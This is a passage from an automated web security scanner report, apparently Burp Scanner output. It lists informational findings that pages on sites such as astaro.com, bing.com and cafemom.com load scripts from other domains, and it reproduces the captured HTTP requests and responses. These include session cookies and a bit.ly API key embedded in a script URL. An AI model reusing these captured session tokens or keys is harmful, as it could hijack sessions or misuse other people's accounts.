<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.393. http://www.astaro.com/products/hardware-appliances previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/hardware-appliances

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/hardware-appliances HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:01:54 GMT
ETag: "7d00fd87cfd4d7815e27605d4884338b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 56527
Date: Tue, 01 Feb 2011 14:28:35 GMT
X-Varnish: 1753556523 1753543348
Age: 940
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.394. https://www.astaro.com/en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

GET /en HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-4; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.4.10.1296568533;

Response

HTTP/1.0 404 Not Found
Date: Tue, 01 Feb 2011 13:56:38 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 13:56:37 GMT
ETag: "35eae19b1583446f985b5d3e39eee386"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...

18.395. http://www.autocheck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.googleadservices.com/pagead/conversion.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /?WT.mc_id=3499&siteID=3499 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.396. http://www.bing.com/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.msn.com/library/dap.js

Request

Response

18.397. http://www.bing.com/travel/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/content/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://adsyndication.msn.com/delivery/getads.js

Request

Response

18.398. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=554
Content-Length: 163491
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:48:05 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:38:50 GMT
Connection: close
Set-Cookie: _SS=SID=1EF7E284C39D46AD8D86F6EE70119149; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:50 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c12a7ea31be604f0cb8c16d037c1e1e01; expires=Thu, 31-Jan-2013 15:38:50 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:50 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

18.399. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/earthquake-proof-bridge/pfu8x7j

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/earthquake-proof-bridge/pfu8x7j HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 75024
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:54:04 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.094 secs
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:39:04 GMT
Connection: close
Set-Cookie: _SS=SID=0E7CE822294A42CD8524F2516349A7CA; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:04 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5fb7d909354046438fd1fc0540dc89c0; expires=Thu, 31-Jan-2013 15:39:04 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

18.400. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 75334
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:54:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:39:00 GMT
Connection: close
Set-Cookie: _SS=SID=5D60D286C88D483D8DBAD286E317EC6A; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:59 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce52edfd91ed34df8b9cb6bd298f4aa00; expires=Thu, 31-Jan-2013 15:38:59 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:00 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

18.401. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/jay-mohr-part-1/17wj9ueo7

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/jay-mohr-part-1/17wj9ueo7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 68736
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:53:57 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:38:57 GMT
Connection: close
Set-Cookie: _SS=SID=856CA4547D17422A9F9EEBE7CD0948AA; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:38:57 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4719dd51aea946e09721264c2dd06e9e; expires=Thu, 31-Jan-2013 15:38:57 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623818&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:38:57 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

18.402. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

GET /videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7689f9b6106a4956aba5a571b964d2fe; MUID=F741A5D3C8544F77A0B57D8439E7E06E&TUID=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1621087&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 76979
Content-Type: text/html; charset=utf-8
Expires: Tue, 01 Feb 2011 15:54:17 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 1.609 secs
X-UA-Compatible: IE=7
Date: Tue, 01 Feb 2011 15:39:17 GMT
Connection: close
Set-Cookie: _SS=SID=285C4420063547BF81BA301ACB6320FF; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Thu, 31-Jan-2013 15:39:15 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4411ae822b2c4380819b4497bf93da14; expires=Thu, 31-Jan-2013 15:39:15 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1623819&D=1593447&AF=NOFORM; expires=Thu, 31-Jan-2013 15:39:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

18.403. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

Issue detail

The response dynamically includes the following scripts from other domains:

http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js

Request

Response

18.404. http://www.bundle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bundle.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://analytics.live.com/Analytics/msAnalytics.js
http://bit.ly/javascript-api.js?version=latest&login=jayk&apiKey=R_f1ac808d96b3430478cc0b7453905b5b

Request

GET / HTTP/1.1
Host: www.bundle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-app02
X-Bundle-Server: prod-web02
Date: Wed, 02 Feb 2011 15:44:24 GMT
Content-Length: 9134
Connection: close
Cache-Control: private
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT
Expires: Wed, 02 Feb 2011 15:39:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</div>

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=jayk&apiKey=R_f1ac808d96b3430478cc0b7453905b5b"></script>
<script language="javascript" type="text/javascript" src="http://analytics.live.com/Analytics/msAnalytics.js"></script>

<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

18.405. http://www.cafemom.com/group/416 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafemom.com
Path:	/group/416

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/cmiss.dart/groups_parent;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=160x112;tile=4;ord=990903479?
http://ad.doubleclick.net/adj/cmiss.dart/groups_parent;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=160x600;tile=3;ord=990903479?
http://ad.doubleclick.net/adj/cmiss.dart/groups_parent;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=728x90;tile=1;ord=990903479?
http://ad.doubleclick.net/adj/cmiss.dart/groups_parent_belowfold;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=300x250;tile=2;ord=990903479?
http://content.dl-rms.com/rms/mother/11982/nodetag.js
http://edge.quantserve.com/quant.js
http://static-01.cafemomstatic.com/28664/js/cafemom.js

Request

GET /group/416 HTTP/1.1
Host: www.cafemom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 04:07:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=kaal1k0po2hun5f30108dr9mr2; path=/; domain=.cafemom.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=m2opnk57fo2c72ffiiqtijl195; path=/; domain=.cafemom.com
Set-Cookie: cafemomis=m2opnk57fo2c72ffiiqtijl195; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
Set-Cookie: fp=%2Fgroup%2F416; expires=Sat, 05-Mar-2011 04:07:11 GMT; path=/; domain=.cafemom.com
Set-Cookie: use_mobile=0; expires=Sun, 31-Jan-2021 04:07:11 GMT; path=/; domain=.cafemom.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="h
...[SNIP]...
</style>
<script type="text/javascript" src="http://static-01.cafemomstatic.com/28664/js/cafemom.js"></script>
...[SNIP]...
<div><script type="text/javascript" language="Javascript1.1" src="http://ad.doubleclick.net/adj/cmiss.dart/groups_parent;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=728x90;tile=1;ord=990903479?"></script>
...[SNIP]...
<div><script type="text/javascript" language="Javascript1.1" src="http://ad.doubleclick.net/adj/cmiss.dart/groups_parent_belowfold;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=300x250;tile=2;ord=990903479?"></script>
...[SNIP]...
<div><script type="text/javascript" language="Javascript1.1" src="http://ad.doubleclick.net/adj/cmiss.dart/groups_parent;dcopt=ist;ap1=0;ap2=0;ap3=0;a0_0=0;a0_4=0;a0_7=0;a0_10=0;a1_0=0;a1_7=0;a2=0;a3=0;a4=0;a5=0;a6=0;a7=0;a9=0;a11=0;a13=0;a15=0;a18=0;spon=0;sens=0;m=0;mage=0;area=groups;gcat=parent;gid=416;2omk=;tier=home;sz=160x600;tile=3;ord=990903479?"></script>
...[SNIP]...
